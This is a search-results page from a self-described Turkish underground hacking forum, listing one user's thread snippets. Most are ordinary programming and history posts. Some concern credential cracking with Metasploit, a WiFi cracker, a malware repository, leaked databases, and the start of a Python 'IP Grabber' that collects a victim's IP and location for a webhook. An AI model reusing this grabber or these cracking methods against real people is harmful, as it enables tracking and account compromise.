Warriors.to Underground Forum - Hack Forum - Leak Forum
  • Home
  • Forums
    New posts Search forums
  • Resources
    Latest reviews Search resources
  • Members
    Current visitors New profile posts Search profile posts
  • Awards
  • Chat 0
Log in Register
What's new Search

Search

By:
Advanced search…
Warriors.to Underground Forum - Hack Forum - Leak Forum
    • Home
    • Search
  • Home
  • Search
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.

Search results

  1. L

    PHP crypt() Function

    Definition and Usage The crypt() function returns a hashed string using DES, Blowfish, or MD5 algorithms. This function behaves different on different operating systems. PHP checks what algorithms are available and what algorithms to use when it is installed. The salt parameter is optional...
    • Lexter
    • Thread
    • Dec 2, 2022
    • Replies: 0
    • Forum: PHP/JS/MySQL/Perl
  2. L

    Favorite database leaks

    What is your favorite for database leaks? For me is Baddoo,Twitter and Facebook.
    • Lexter
    • Thread
    • Dec 2, 2022
    • Replies: 0
    • Forum: Off-Topic
  3. L

    MUSTAFA KEMAL AS AN ARMY COMMANDER

    In 1906, he was sent to Damascus (Şam). Mustafa Kemal and his friends founded a society which they called "Vatan ve Hürriyet" (Fatherland and Freedom) in Damascus. On his own initiative, he went to Tripoli during the war with Italy in 1911 and took part in the defence of Derne and Tobruk While...
    • Lexter
    • Thread
    • Dec 2, 2022
    • Replies: 0
    • Forum: MUSTAFA KEMAL ATATÜRK
  4. L

    MUSTAFA KEMAL’S CHILDHOOD AND EDUCATION

    Mustafa Kemal Atatürk (1881- 1938) was the founder and the first President of the Republic of Turkey. Mustafa Kemal was born in 1881 in Salonika (Selanik). His fathers name was Ali Rıza Efendi. His father was customs official. His mothers name was Zübeyde Hanım. For his primary education, he...
    • Lexter
    • Thread
    • Dec 2, 2022
    • Replies: 0
    • Forum: MUSTAFA KEMAL ATATÜRK
  5. L

    IDA Pro, Hex Rays Software

    IDA Pro is one of the best and most popular reverse engineering software tools. It’s an interactive disassembler that has a built-in command language (IDC) and supports a number of executable formats for various processors and operating systems. IDA Pro also has a great number of plugins that...
    • Lexter
    • Thread
    • Dec 2, 2022
    • Replies: 3
    • Forum: Reverse Engineering
  6. L

    Most Secure Decentralized Cloud Drive on Linux

    Nowadays can we imagine that we load a large file on our thumb drive and go to our friend's home to give the file? No this is the era of cloud. We can easily store that file on our cloud storage and share it with our friend. Cloud storage solves a lot of problems. But every innovation had their...
    • Lexter
    • Thread
    • Dec 1, 2022
    • Replies: 0
    • Forum: Anonymity
  7. L

    [MySQL] Cracking the Credentials

    Let’s try mysql_login module first to crack some valid credentials of the MYSQL. Start METASPLOIT in Kali Linux. Type use command to load the module: Type options to see the current settings of this module: Now create a file including a list of common usernames. I just prepared a short list...
    • Lexter
    • Thread
    • Dec 1, 2022
    • Replies: 0
    • Forum: Web Hacking/Security
  8. L

    Differences between Standard Pascal and Delphi

    1. The way procedures and functions can be passed as parameters differs: Delphi requires explicit procedural types to be declared where Standard Pascal does not. 2. Delphi does not support so called 'extraprocedural gotos', in which goto statements may reference targets outside the current...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Delphi / Pascal
  9. L

    Comparison of Pascal and Delphi

    Devised by Niklaus Wirth in the late 1960s and early 1970s, Pascal is a programming language. Originally produced by Borland Software Corporation, Embarcadero Delphi is composed of an IDE, set of standard libraries, and a Pascal-based language commonly called either Object Pascal, Delphi Pascal...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Delphi / Pascal
  10. L

    Windows Calculator app

    The Windows Calculator app is a modern Windows app written in C++ and C# that ships pre-installed with Windows. The app provides standard, scientific, and programmer calculator functionality, as well as a set of converters between various units of measurement and currencies. You can use source...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: C / C++ / C# / .NET / Java
  11. L

    FERN WiFi Cracker

    Fern WiFi cracker, The name says about it. It's a GUI based WiFi security auditing tool that written on Python. Fern WiFi cracker can crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or Ethernet based networks. Fern created by Saviour Emmanuel Ekiko. Here...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 1
    • Forum: Wireless Hacking/Security
  12. L

    (NMAP) Network scanning

    Simple NMAP scan of IP range The default scan of nmap is to run the command and specify the IP address(es) without any other options. In this default scan, nmap will run a TCP SYN connection scan to 1000 of the most common ports as well as an icmp echo request to determine if a host is up. MORE...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Network Hacking/Security
  13. L

    Osintgram

    Osintgram is a OSINT tool on Instagram to collect, analyze and run reconnaissance. It offers an interactive shell to perform analysis on Instagram accounts by nickname. Link: https://github.com/Datalux/Osintgram
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Cyber Intelligence
  14. L

    IP Grabber

    import requests import json from dhooks import Webhook, Embed from datetime import datetime hook = Webhook("webhook-url-here") time = datetime.now().strftime("%H:%M %p") ip = requests.get('https://api.ipify.org/').text r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}') geo = r.json()...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Python
  15. L

    Python cheatsheet for beginners

    Enjoy :) https://cdn-131.anonfiles.com/13g4If59o7/c9382c41-1669831133/PYTHON%20CHEATSHEET%20FOR%20BEGINNERS.pdf"
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Python
  16. L

    Repository of Malwares

    This repository is one of the few malware collections on GitHub. Almost every sample here is malicious so I strongly recommend you to neither open these files on real hardware, nor misuse the malware to prank your friends. Playing with these samples may lead to irreversible consequences which...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 1
    • Forum: Malware
  17. L

    Ghidra Software Reverse Engineering Framework

    You can download and install from github https://github.com/NationalSecurityAgency/ghidra
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Reverse Engineering
  18. L

    Is Using VPN With Tails as Bad as They Say?

    The Tails VPN Support page insists that combining Tails and VPNs is bad. Moreover, replacing Tor with a VPN is a bad idea as well. As shown earlier, setting up a VPN isn’t too straightforward. If you’re inexperienced, it’s easy to make a mistake during the process. Disabling Tor is a bad idea...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Anonymity
  19. L

    Why Do We Need OSINT Tools?

    OSINT tools and techniques are common in cybersecurity, where they are used to identify external threads or for ethical hacking and penetration testing. Law enforcement agencies, private investigators, and journalists also rely on the same techniques to learn more about a crime, suspect...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Cyber Intelligence
  20. L

    The 9 Best OSINT Software & Tools

    (1) Maltego – Investigations via Java Graphs Maltego is a Java application that claims to simplify and expedite your investigations. How exactly? Thanks to its fantastic access to databases and visualization tools. Whether you’re in trust and safety, law enforcement, or cybersecurity, the...
    • Lexter
    • Thread
    • Nov 30, 2022
    • Replies: 0
    • Forum: Cyber Intelligence
  • 1
  • 2
Next
1 of 2

Go to page

Next Last
  • Home
  • Search


About Warriors.to

It is a real Turkish hacking forum. It was established in 2022 and its aim is to respond to the attacks against Turkey and gather Turkish hackers under one roof.
Gerçek Türk Hack Forumudur. 2022 yılında kurulmuş olup amacı Türkiye'ye yönelik saldırılara karşılık vermek ve Türk hackerları tek çatı altında toplamaktır.

Forum Navigation

  •   Yönetici Listesi
  •   Üye Listesi
  •   Arama Yap

Yardım

  •   Forum Dökümanları

Hesap

  •   Kontrol Panel
  • English (US)
  • Contact us
  • Help
  • Home
  • RSS
Theme Made by W4H9LT 
Advanced Forum Stats, Awards System by AddonFlare - Premium XF2 Addons
Some of the add-ons on this site are powered by XenConcept™ ©2017-2025 XenConcept Ltd. (Details)
| Xenforo Add-ons © by ©XenTR
Top Bottom